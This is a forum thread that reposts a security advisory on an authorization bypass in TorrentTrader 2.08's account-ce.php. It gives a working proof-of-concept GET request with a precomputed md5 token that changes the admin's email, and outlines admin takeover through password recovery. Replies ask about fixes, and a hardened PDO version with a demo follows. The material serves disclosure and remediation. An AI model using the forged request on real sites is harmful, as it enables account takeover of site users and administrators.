#1
Unauthorized Email Change
###############################################################################
1. Unauthorized Email Change in "account-ce.php"
###############################################################################
Reason: authorization bypass
Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's
-----------------[ source code start ]---------------------------------
PHP Code:
Tests:
Let's find the md5 hash of the email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452". The target user ID is 1. We issue the GET request:
http://localhost/torrenttrader208/account-ce.php?id=1&secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com
A quick look at the database confirms that the email address of the user with ID 1 has indeed been changed. The next logical move for the attacker is a password recovery request:
http://localhost/torrenttrader208/account-recover.php
After the admin account takeover the attacker is able to use the next vulnerability, described below, which may allow PHP remote code execution.
###############################################################################
Last edited by Thor; 14th April 2019 at 11:31. Reason: Edited Code to make it Readable
#2
What is that? Please explain in full detail.
#3
Reason: authorization bypass
Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's
Code:
$id    = (int) $_GET["id"];
$md5   = $_GET["secret"];
$email = $_GET["email"];
..
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
..
$sec = $row["editsecret"];
// When no email change is pending, editsecret is '' and the expected token
// collapses to md5('' . $email . ''), i.e. md5($email), which anyone can
// compute for any email they choose. There is no check that a change was
// ever requested for this account.
if ($md5 != md5($sec . $email . $sec))
    show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
// The WHERE clause compares against that same (empty) editsecret, so the
// update succeeds for any enabled, confirmed user id.
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = " . sqlesc($email) . " WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));
Tests:
Let's find the md5 hash of the email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452". The target user ID is 1. We issue the GET request:
http://localhost/torrenttrader208/account-ce.php?id=1&secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com
A quick look at the database confirms that the email address of the user with ID 1 has indeed been changed. The next logical move for the attacker is a password recovery request:
http://localhost/torrenttrader208/account-recover.php
After the admin account takeover the attacker is able to use the next vulnerability, described below, which may allow PHP remote code execution.
The Following User Says Thank You to BamBam0077 For This Useful Post: papad (13th April 2019)
#4
This would be SQL injection, correct? I've been looking at adding something to improve this. So far it looks like PDO is the best, or can you do it using composer.json?
I'm new to this, but could you point us in the right direction to implement one of these?
The Following User Says Thank You to M-jay For This Useful Post: BamBam0077 (21st October 2019)
#5
Just sanitize the variables in the SQL query where necessary, with sqlesc() or mysqli_real_string_escape() if you have converted over to mysqli, and I believe try to use trim() around:
PHP Code:
PHP Code:
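Added example (editor's code, not TorrentTrader's and not from any poster in this thread): a hardened version of the account-ce.php logic quoted in post #3, written with PDO prepared statements because posts #4 and #5 ask about PDO and escaping. Note that the snippet in post #3 already casts `id` to int and passes `email` through sqlesc(), so the flaw the advisory describes is the authorization check, not injection; the fix that matters is refusing the request when no change is pending (editsecret is empty) and comparing the token in constant time. The token scheme md5(secret . email . secret) is kept only to stay close to the page's code. The in-memory SQLite database, the pdo_sqlite extension, the column layout and the sample rows are all assumptions made for the demo.

```php
<?php
// Added example, not TorrentTrader code. Assumes the pdo_sqlite extension;
// table layout and rows below are constructed for the demo.
declare(strict_types=1);

// The check from post #3, kept only to show the bypass: with editsecret ''
// the expected token is md5('' . $email . ''), which anyone can compute.
function vulnerable_token_ok(string $storedSecret, string $email, string $supplied): bool
{
    return $supplied == md5($storedSecret . $email . $storedSecret);
}

// Hardened check: no pending change means no token can be valid, and the
// comparison is constant-time and strict instead of a loose ==.
function token_ok(string $storedSecret, string $email, string $supplied): bool
{
    if ($storedSecret === '') {
        return false;
    }
    $expected = md5($storedSecret . $email . $storedSecret);
    return hash_equals($expected, $supplied);
}

// Constructed users table: user 1 (admin) has no pending change,
// user 2 has requested a change and holds a pending editsecret.
function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT,
               editsecret TEXT, enabled TEXT, status TEXT)');
    $ins = $db->prepare('INSERT INTO users VALUES (?, ?, ?, ?, ?)');
    $ins->execute([1, 'admin@example.com', '', 'yes', 'confirmed']);
    $ins->execute([2, 'bob@example.com', 'pending-secret-xyz', 'yes', 'confirmed']);
    return $db;
}

// Replacement for the SELECT/UPDATE pair in account-ce.php: bound
// parameters instead of string building, and the hardened token check
// between the two queries. Returns true only when a row was updated.
function change_email(PDO $db, int $id, string $email, string $supplied): bool
{
    $sel = $db->prepare("SELECT editsecret FROM users
                         WHERE enabled = 'yes' AND status = 'confirmed' AND id = :id");
    $sel->execute([':id' => $id]);
    $row = $sel->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;
    }
    $stored = (string) $row['editsecret'];
    if (!token_ok($stored, $email, $supplied)) {
        return false;
    }
    $upd = $db->prepare("UPDATE users SET editsecret = '', email = :email
                         WHERE id = :id AND editsecret = :sec");
    $upd->execute([':email' => $email, ':id' => $id, ':sec' => $stored]);
    return $upd->rowCount() === 1;
}

$db = make_db();
// What the advisory's GET request sends as "secret": md5 of the chosen email.
$forged = md5('test@test.com');

// Old check against the admin row (editsecret ''): the forged token passes.
var_dump(vulnerable_token_ok('', 'test@test.com', $forged));
// Hardened path for the same request: rejected, row untouched.
var_dump(change_email($db, 1, 'test@test.com', $forged));
// A genuine pending change with the matching token still goes through.
$good = md5('pending-secret-xyz' . 'bob2@example.com' . 'pending-secret-xyz');
var_dump(change_email($db, 2, 'bob2@example.com', $good));
```

Run with `php` on the command line. The two changes that close the bypass are the `$storedSecret === ''` guard and `hash_equals()`; the prepared statements answer the PDO question in post #4 but do not by themselves fix the advisory's issue.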